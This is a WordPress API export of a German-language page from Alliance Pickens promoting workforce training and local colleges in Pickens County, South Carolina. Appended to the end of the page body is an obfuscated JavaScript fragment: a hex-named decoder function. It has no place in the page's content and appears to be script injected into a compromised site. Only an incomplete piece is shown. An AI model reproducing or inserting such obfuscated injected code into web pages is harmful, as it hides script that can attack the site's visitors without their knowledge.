{"id":6294,"date":"2020-10-28T14:30:13","date_gmt":"2020-10-28T14:30:13","guid":{"rendered":"http:\/\/alliancepickens.com\/personalentwicklung\/ausbildung-personalentwicklung\/"},"modified":"2020-12-04T20:13:07","modified_gmt":"2020-12-04T20:13:07","slug":"ausbildung-personalentwicklung","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/","title":{"rendered":"Ausbildung &amp; Personalentwicklung"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Eine gut ausgebildete und gut ausgebildete Belegschaft ist das bestimmende Merkmal von Pickens County.South Carolina.USA. Unser Personalentwicklungsprogramm ist die Heimat des S<em>cholar Technician<\/em>und verschafft dem Unternehmen in Pickens County einen echten Wettbewerbsvorteil.<\/p>\n<p>Der Pickens County School District ist in South Carolina der rangh\u00f6chste countywide School District des Bundesstaates. Das Pickens County Career and Technology Center hat auch eine Geschichte der Exzellenz als die Nummer eins praktische Lerneinrichtung in South Carolina. Es ist das einzige Zentrum mit einer 5-Achsen-Maschine, die F\u00fcr Gymnasiasten zur Verf\u00fcgung steht. Pickens County ist auch die Heimat der Clemson University, der Southern Wesleyan University und des Tri-County Technical College, die Den Unternehmen im Pickens County einen Wettbewerbsvorteil bieten.<\/p>\n<p><a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/de\/personalentwicklung\/scholar-technician-program\/\">Lesen Sie mehr<\/a>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10311&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;10492&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>CLEMSON UNIVERSITY<\/h3>\n<ul>\n<li>Carnegie R1 Forschungsinstitut in Pickens County<\/li>\n<li>734 Mio. USD f\u00fcr die Einreichung von Forschungsvorschl\u00e4gen im GJ20<\/li>\n<li>Clemson hat drei (3) College Football Playoff National Championships gewonnen; Die erste wurde 1981 gewonnen, die zweite 2016 und die dritte im Jahr 2018.<\/li>\n<li>Clemson auf Platz 1 in South Carolina und Platz 29 national f\u00fcr Bachelor-Engineering-Programme unter den nationalen \u00f6ffentlichen Universit\u00e4ten \u2013 USNews &amp; World Report, 2019<\/li>\n<li>Clemson auf Platz 11 der innovativsten Schulen unter den nationalen \u00f6ffentlichen Universit\u00e4ten \u2013 USNews &amp; World Report, 2019<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>Tri-County Technical College<\/h3>\n<ul>\n<li>Bietet \u00fcber 70 Associate Degree-, Diplom- und Zertifikatsprogramme<\/li>\n<li>Tri-Technical College bietet arbeitsbasierte Lernerfahrungen, darunter BMW Technical Scholars Program, Michelin Technical Scholars Program, Duke Energy Co-op Program und mehr<\/li>\n<li>Kooperative Bildung, oft Co-op genannt, M\u00f6glichkeiten zur Integration von Unterrichtsunterricht in die reale Besch\u00e4ftigung, um Den Studierenden bezahlte Berufserfahrung in einem Bereich zu vermitteln, der mit ihren akademischen oder beruflichen Zielen zusammenh\u00e4ngt<\/li>\n<li>I-BEST (Integrated Basic Education and Skills Training) ist ein national anerkanntes Personalentwicklungsprogramm f\u00fcr Studierende, die sich auf MINT-Karrieren vorbereiten.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5673&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5663&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>SOUTHERN WESLEYAN<\/h3>\n<ul>\n<li>Liberal Arts College<\/li>\n<li>Dual Enrollment Program im Zusammenhang mit dem Pickens County Career and Technology Center for Global Logistics and Supply Chain Management<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>DIE PICKENS COUNTY CAREER UND TECHNOLOGIE ZENTRUM<\/h3>\n<ul>\n<li>Das Pickens County Career and Technology Center (PCCTC) ist ein f\u00fchrendes Unternehmen im Bundesstaat South Carolina, das alle vom Bund anerkannten Perkins-Standards erf\u00fcllt.<\/li>\n<li>Das PCCTC hat ihre Einschreibung Ballon zu \u00fcber 1.400 Studenten mit Studenten, die die Programme bereits in der 8. Klasse<\/li>\n<li>Arbeitsbasierte Programme helfen bei der Bereitstellung von berufsbezogenen F\u00e4higkeiten und Schulungen, die beim Aufbau der Talentpipeline f\u00fcr Unternehmen in Pickens County helfen.<\/li>\n<li>Studierende, die diese Studieng\u00e4nge abschlie\u00dfen, haben mindestens 2,5 Jahre Ausbildung im Klassenzimmer und am Arbeitsplatz und verlassen ihr Studienprogramm mit mindestens (1) von der Industrie anerkannter Zertifizierung.  [Read More]<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5646&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;greendiv&#8221;][vc_column][vc_separator color=&#8221;custom&#8221; border_width=&#8221;3&#8243; el_width=&#8221;50&#8243;][\/vc_column][\/vc_row][vc_row el_class=&#8221;workforce&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;10513&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>SCHOOL DISTRICT VON PICKENS COUNTY<\/h3>\n<ul>\n<li>Der School District of Pickens County ist ein #1 County District im Bundesstaat South Carolina im Bundesstaat South Carolina.<\/li>\n<li>Der Bezirk verf\u00fcgt auch \u00fcber eine 85% p\u00fcnktliche Abschlussquote mit 73% der Studenten, die mindestens eine Silber-Zertifizierung auf dem WIN-Test<\/li>\n<li>F\u00fchrungskr\u00e4fte aus Bildung, Wirtschaft und Industrie arbeiten zusammen, um sicherzustellen, dass die Studenten von Pickens County \u00fcber die Ausbildung verf\u00fcgen, die sie ben\u00f6tigen, wenn sie ins Erwerbsleben eintreten.<\/li>\n<li>Die Studenten in Pickens County zeichnen sich durch standardisierte Tests aus, nehmen an Meisterschaftsteams f\u00fcr Naturwissenschaften, Technik, Ingenieurwesen und Mathematik (MINT) teil und genie\u00dfen die Vorteile des Lernens in neuen, hochmodernen Einrichtungen<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4771&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h3>SC WORKS TRAINING<\/h3>\n<p>Jedes Jahr profitieren fast 100 Unternehmen von den Fachkr\u00e4ften, die von readySC\u2122 ausgebildet werden. Das Programm ist einzigartig, da die Mitarbeiter nach den Vorgaben der Unternehmen geschult werden \u2013 zu geringen oder gar keinen Kosten. Unternehmen, die sich f\u00fcr eine Verlagerung oder Erweiterung ihrer bestehenden Aktivit\u00e4ten in South Carolina entscheiden, k\u00f6nnen die Schulungsressourcen nutzen, um eine starke, produktive Belegschaft zu gew\u00e4hrleisten.[\/vc_column_text][vc_column_text]<a class=\"greenbtn\" href=\"https:\/\/www.readysc.org\/index.html\" target=\"_blank\" rel=\"noopener noreferrer\">Erfahren Sie mehr readySC\u2122<\/a>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;5636&#8243; img_size=&#8221;full&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Erfahren Sie mehr \u00fcber die Entwicklung von Arbeitskr\u00e4ften<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;21&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h3>Wir freuen uns auf ein Gespr\u00e4ch mit Ihnen!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact_directions\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Eine gut ausgebildete und gut ausgebildete Belegschaft ist das bestimmende Merkmal von Pickens County.South Carolina.USA. Unser Personalentwicklungsprogramm ist die Heimat des Scholar Technicianund verschafft dem Unternehmen in Pickens County einen echten Wettbewerbsvorteil. Der Pickens County School District ist in South Carolina der rangh\u00f6chste countywide School District des Bundesstaates. Das Pickens County Career and&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6078,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6294","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Ausbildung &amp; Personalentwicklung - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ausbildung &amp; Personalentwicklung - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Eine gut ausgebildete und gut ausgebildete Belegschaft ist das bestimmende Merkmal von Pickens County.South Carolina.USA. Unser Personalentwicklungsprogramm ist die Heimat des Scholar Technicianund verschafft dem Unternehmen in Pickens County einen echten Wettbewerbsvorteil. Der Pickens County School District ist in South Carolina der rangh\u00f6chste countywide School District des Bundesstaates. Das Pickens County Career and&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:13:07+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/ausbildung-personalentwicklung\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/ausbildung-personalentwicklung\\\/\",\"name\":\"Ausbildung &amp; Personalentwicklung - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"datePublished\":\"2020-10-28T14:30:13+00:00\",\"dateModified\":\"2020-12-04T20:13:07+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/ausbildung-personalentwicklung\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/ausbildung-personalentwicklung\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/ausbildung-personalentwicklung\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Personalentwicklung\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/personalentwicklung\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Ausbildung &amp; Personalentwicklung\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ausbildung &amp; Personalentwicklung - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/","og_locale":"de_DE","og_type":"article","og_title":"Ausbildung &amp; Personalentwicklung - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Eine gut ausgebildete und gut ausgebildete Belegschaft ist das bestimmende Merkmal von Pickens County.South Carolina.USA. Unser Personalentwicklungsprogramm ist die Heimat des Scholar Technicianund verschafft dem Unternehmen in Pickens County einen echten Wettbewerbsvorteil. Der Pickens County School District ist in South Carolina der rangh\u00f6chste countywide School District des Bundesstaates. Das Pickens County Career and&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:13:07+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/","url":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/","name":"Ausbildung &amp; Personalentwicklung - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"datePublished":"2020-10-28T14:30:13+00:00","dateModified":"2020-12-04T20:13:07+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Personalentwicklung","item":"https:\/\/alliancepickens.com\/de\/personalentwicklung\/"},{"@type":"ListItem","position":3,"name":"Ausbildung &amp; Personalentwicklung"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6294","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=6294"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6294\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6078"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=6294"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}